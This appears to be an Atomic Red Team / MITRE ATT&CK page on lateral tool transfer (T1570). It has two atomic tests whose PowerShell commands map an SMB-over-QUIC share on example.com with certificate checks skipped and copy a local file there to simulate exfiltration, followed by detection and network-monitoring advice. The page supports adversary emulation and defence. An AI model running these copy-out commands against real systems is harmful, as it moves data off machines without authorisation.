Ctrl+K

T1570 - Lateral Tool Transfer

T1570 - Lateral Tool Transfer#

Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., Ingress Tool Transfer) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.

Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB/Windows Admin Shares to connected network shares or with authenticated connections via Remote Desktop Protocol.(Citation: Unit42 LockerGoga 2019)

Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and ftp. In some cases, adversaries may be able to leverage Web Services such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.(Citation: Dropbox Malware Sync)

Atomic Tests#

Atomic Test #1 - Exfiltration Over SMB over QUIC (New-SmbMapping)Simulates an attacker exfiltrating data over SMB over QUIC using the New-SmbMapping command.#

Prerequisites:

  • A file server running Windows Server 2022 Datacenter: Azure Edition

  • A Windows 11 computer

  • Windows Admin Center Supported Platforms: windows Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell

New-SmbMapping -RemotePath '\\example.com\sales' -TransportType QUIC -SkipCertificateCheck
copy 'C:\path\to\file.txt' 'Z:\'

Invoke-AtomicTest T1570 -TestNumbers 1

Atomic Test #2 - Exfiltration Over SMB over QUIC (NET USE)Simulates an attacker exfiltrating data over SMB over QUIC using the NET USE command.#

Prerequisites:

  • A file server running Windows Server 2022 Datacenter: Azure Edition

  • A Windows 11 computer

  • Windows Admin Center Supported Platforms: windows Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell

NET USE * '\\example.com\sales' /TRANSPORT:QUIC /SKIPCERTCHECK
copy 'C:\path\to\file.txt' '*:\'

Invoke-AtomicTest T1570 -TestNumbers 2

Detection#

Monitor for file creation and files transferred within a network using protocols such as SMB or FTP. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.

Shield Active Defense#

Network Monitoring#

Monitor network traffic in order to detect adversary activity.

Network monitoring involves capturing network activity data, including capturing of server, firewall, and other relevant logs. A defender can then review them or send them to a centralized collection location for further analysis.

Opportunity#

There is an opportunity to monitor network traffic for different protocols, anomalous traffic patterns, transfer of data, etc. to determine the presence of an adversary.

Use Case#

The defender can implement network monitoring for and alert on anomalous traffic patterns, large or unexpected data transfers, and other activity that may reveal the presence of an adversary.

Procedures#

Capture network logs for internet-facing devices and send those logs to a central collection location. Capture all network device (router, switches, proxy, etc.) logs on a decoy network and send those logs to a central collection location.

Contents